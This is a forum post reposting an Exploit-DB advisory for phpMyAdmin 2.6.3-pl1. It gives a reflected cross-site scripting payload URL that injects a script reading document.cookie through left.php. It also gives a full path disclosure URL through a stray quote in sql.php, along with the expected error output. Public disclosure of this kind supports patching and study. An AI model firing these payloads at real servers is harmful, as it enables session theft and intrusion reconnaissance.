Jump to content
begood

phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path

By begood, in Exploituri

Recommended Posts

begood Newbie

begood

Posted
Posted 

 [URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#viewSource"]view  source[/URL]
[URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#printSource"]print[/URL][URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#about"]?[/URL]

# Exploit Title: phpMyAdmin  2.6.3-pl1 Cross Site Scripting and Full Path
Disclosure.
# Date: 20/04/10
# Author: cp77fk4r |  empty0page[SHIFT+2]gmail.com | [URL="http://www.digitalwhisper.co.il/"]www.DigitalWhisper.co.il[/URL]
# Software Link: [URL="http://www.phpmyadmin.net/"]www.phpmyadmin.net[/URL]  |
[url=http://www.phpmyadmin.net/home_page/downloads.php]phpMyAdmin - Download[/url]
# Version: 2.6.3-pl1
# Tested on: PHP
#
##[Cross Site Scripting]*
(Cross-Site Scripting attacks are a type of  injection problem, in which
malicious scripts are injected into the otherwise  benign and trusted web
sites. Cross-site scripting (XSS) attacks occur when  an attacker uses a web
application to send malicious code, generally in the  form of a browser side
script, to a different end user. Flaws that allow  these attacks to succeed
are quite widespread and occur anywhere a web  application uses input from a
user in the output it generates without validating  or encoding it)
http://
[server]/phpmyadmin/left.php?lang=he-iso-8859-8-i&server=1&hash=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
#
#
##[FULL PATH DICSLOSURE]**
(Full Path Disclosure (FPD) vulnerabilities enable  the attacker to see the
path to the webroot/file. e.g.:  /home/omg/htdocs/file/. Certain
vulnerabilities, such as using the load_file()  (within a SQL Injection)
query to view the page source, require the attacker  to have the full path to
the file they wish to view. (OWASP))
#
http://
[server]/phpmyadmin/sql.php?lang=he-iso-8859-8-i&server=1&db=x&table=x&sql_query=1'
#
Will returne:
#
Fatal error: Cannot use string offset as an array in  [FPD] on line 901
#
#
*The victim must be logged in.
**The attacker must be logged in.
#
#
[e0f]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...